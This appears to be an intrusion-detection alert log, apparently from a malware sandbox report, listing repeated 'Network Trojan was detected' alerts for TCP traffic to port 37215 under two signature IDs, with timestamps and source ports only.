                Timestamp:05/29/24-15:15:53.845149
                SID:2835222
                Source Port:38752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560000
                SID:2835222
                Source Port:59404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233356
                SID:2835222
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555499
                SID:2829579
                Source Port:33374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782506
                SID:2835222
                Source Port:35444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689082
                SID:2829579
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231988
                SID:2829579
                Source Port:56770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501853
                SID:2829579
                Source Port:57260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795877
                SID:2829579
                Source Port:36336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236116
                SID:2835222
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586173
                SID:2829579
                Source Port:39254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.983919
                SID:2829579
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586843
                SID:2829579
                Source Port:54902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763305
                SID:2829579
                Source Port:43212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968548
                SID:2835222
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222668
                SID:2835222
                Source Port:54358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781671
                SID:2835222
                Source Port:48954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221815
                SID:2829579
                Source Port:38238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505029
                SID:2835222
                Source Port:42324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339676
                SID:2835222
                Source Port:44608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794545
                SID:2835222
                Source Port:53304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863067
                SID:2835222
                Source Port:56948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217089
                SID:2829579
                Source Port:33438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325747
                SID:2829579
                Source Port:58352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175411
                SID:2829579
                Source Port:57744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914296
                SID:2829579
                Source Port:55022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978367
                SID:2835222
                Source Port:39808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915599
                SID:2829579
                Source Port:34496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779534
                SID:2835222
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035262
                SID:2835222
                Source Port:33830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165130
                SID:2829579
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140824
                SID:2829579
                Source Port:46590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216863
                SID:2829579
                Source Port:46908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810084
                SID:2829579
                Source Port:45284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277376
                SID:2829579
                Source Port:57724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763282
                SID:2835222
                Source Port:35738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770687
                SID:2835222
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271176
                SID:2835222
                Source Port:44310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652241
                SID:2829579
                Source Port:49884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534688
                SID:2835222
                Source Port:44638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015801
                SID:2829579
                Source Port:44136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024442
                SID:2835222
                Source Port:44668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317765
                SID:2829579
                Source Port:40784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169304
                SID:2835222
                Source Port:50624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210084
                SID:2829579
                Source Port:60414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336564
                SID:2835222
                Source Port:33650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770310
                SID:2829579
                Source Port:44014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787093
                SID:2829579
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782999
                SID:2829579
                Source Port:41924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365729
                SID:2835222
                Source Port:50122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532862
                SID:2835222
                Source Port:54632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869352
                SID:2835222
                Source Port:51498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728167
                SID:2835222
                Source Port:37334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992712
                SID:2829579
                Source Port:43886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422298
                SID:2835222
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988889
                SID:2829579
                Source Port:45268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561850
                SID:2829579
                Source Port:37946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416101
                SID:2829579
                Source Port:57226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583201
                SID:2829579
                Source Port:39936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231364
                SID:2835222
                Source Port:40084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584335
                SID:2829579
                Source Port:56582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039721
                SID:2835222
                Source Port:49690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171770
                SID:2829579
                Source Port:55350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782539
                SID:2835222
                Source Port:34622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618046
                SID:2829579
                Source Port:33816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802015
                SID:2829579
                Source Port:60086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806009
                SID:2835222
                Source Port:58038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667875
                SID:2829579
                Source Port:60240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434852
                SID:2835222
                Source Port:56198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861868
                SID:2829579
                Source Port:60834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762779
                SID:2829579
                Source Port:38926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2829579
                Source Port:46850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644757
                SID:2829579
                Source Port:37780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989638
                SID:2829579
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655616
                SID:2829579
                Source Port:45146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026706
                SID:2835222
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614807
                SID:2835222
                Source Port:59190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222052
                SID:2835222
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587157
                SID:2829579
                Source Port:47788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.649434
                SID:2835222
                Source Port:56292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419857
                SID:2835222
                Source Port:54492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257160
                SID:2829579
                Source Port:59622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110661
                SID:2829579
                Source Port:47050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956296
                SID:2829579
                Source Port:42492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025308
                SID:2835222
                Source Port:41090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398769
                SID:2829579
                Source Port:45948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316565
                SID:2835222
                Source Port:46180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663758
                SID:2829579
                Source Port:51012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820408
                SID:2835222
                Source Port:55556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136238
                SID:2829579
                Source Port:44256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773674
                SID:2829579
                Source Port:38900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651884
                SID:2829579
                Source Port:48730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464787
                SID:2829579
                Source Port:42156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786800
                SID:2829579
                Source Port:45840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270346
                SID:2835222
                Source Port:59290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881217
                SID:2829579
                Source Port:49794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105019
                SID:2835222
                Source Port:41504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380458
                SID:2829579
                Source Port:42064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853229
                SID:2835222
                Source Port:41996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207489
                SID:2835222
                Source Port:56776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434908
                SID:2829579
                Source Port:55014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171060
                SID:2835222
                Source Port:42702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841854
                SID:2835222
                Source Port:53352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783085
                SID:2829579
                Source Port:55846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711948
                SID:2829579
                Source Port:55978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945261
                SID:2829579
                Source Port:34218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899053
                SID:2829579
                Source Port:39594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559524
                SID:2835222
                Source Port:46328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465494
                SID:2835222
                Source Port:48128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023401
                SID:2835222
                Source Port:37360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512263
                SID:2829579
                Source Port:49614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175925
                SID:2829579
                Source Port:47754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929957
                SID:2835222
                Source Port:45678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816986
                SID:2829579
                Source Port:50010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363541
                SID:2829579
                Source Port:55794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681737
                SID:2835222
                Source Port:57338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978395
                SID:2829579
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666282
                SID:2835222
                Source Port:57394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713930
                SID:2829579
                Source Port:44150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911120
                SID:2829579
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848852
                SID:2829579
                Source Port:39928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622025
                SID:2835222
                Source Port:51508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531324
                SID:2835222
                Source Port:44332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859590
                SID:2829579
                Source Port:49464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983259
                SID:2829579
                Source Port:52286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855510
                SID:2835222
                Source Port:47066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721728
                SID:2835222
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779795
                SID:2835222
                Source Port:42146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716154
                SID:2829579
                Source Port:46368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014782
                SID:2829579
                Source Port:33166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288172
                SID:2835222
                Source Port:47764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329295
                SID:2829579
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384511
                SID:2829579
                Source Port:57746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278294
                SID:2835222
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868880
                SID:2835222
                Source Port:41584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897748
                SID:2835222
                Source Port:49626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655038
                SID:2829579
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584364
                SID:2829579
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791090
                SID:2829579
                Source Port:49118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550889
                SID:2829579
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372367
                SID:2829579
                Source Port:35670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369915
                SID:2829579
                Source Port:57482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645705
                SID:2835222
                Source Port:57140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155585
                SID:2829579
                Source Port:43626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521700
                SID:2829579
                Source Port:48474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660187
                SID:2835222
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663681
                SID:2829579
                Source Port:55630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638983
                SID:2829579
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261702
                SID:2829579
                Source Port:42570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856368
                SID:2829579
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946784
                SID:2835222
                Source Port:43622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522835
                SID:2835222
                Source Port:36954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867714
                SID:2835222
                Source Port:44660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511391
                SID:2835222
                Source Port:57430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653698
                SID:2835222
                Source Port:45556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163931
                SID:2829579
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322856
                SID:2835222
                Source Port:60308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048238
                SID:2835222
                Source Port:35286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319612
                SID:2835222
                Source Port:33766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626741
                SID:2835222
                Source Port:39942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072528
                SID:2829579
                Source Port:54256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384243
                SID:2829579
                Source Port:55864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430800
                SID:2835222
                Source Port:59244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659592
                SID:2835222
                Source Port:51850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928228
                SID:2829579
                Source Port:47430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593472
                SID:2835222
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239528
                SID:2835222
                Source Port:59868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025256
                SID:2835222
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559729
                SID:2835222
                Source Port:35726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986223
                SID:2835222
                Source Port:37918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229195
                SID:2829579
                Source Port:59136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.560706
                SID:2829579
                Source Port:55838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380210
                SID:2829579
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498432
                SID:2835222
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860651
                SID:2835222
                Source Port:48440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.769934
                SID:2835222
                Source Port:52854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872999
                SID:2835222
                Source Port:57524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912664
                SID:2835222
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509924
                SID:2829579
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902889
                SID:2835222
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009397
                SID:2835222
                Source Port:36046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208163
                SID:2835222
                Source Port:59646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779708
                SID:2829579
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437392
                SID:2835222
                Source Port:54802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220699
                SID:2829579
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583560
                SID:2835222
                Source Port:41006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653964
                SID:2829579
                Source Port:45538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136013
                SID:2835222
                Source Port:36520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959188
                SID:2835222
                Source Port:36910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071379
                SID:2835222
                Source Port:45714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332722
                SID:2835222
                Source Port:41488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919797
                SID:2835222
                Source Port:52436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711444
                SID:2835222
                Source Port:54324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281231
                SID:2835222
                Source Port:56244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614069
                SID:2829579
                Source Port:53066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331496
                SID:2829579
                Source Port:33012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265927
                SID:2835222
                Source Port:49068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896457
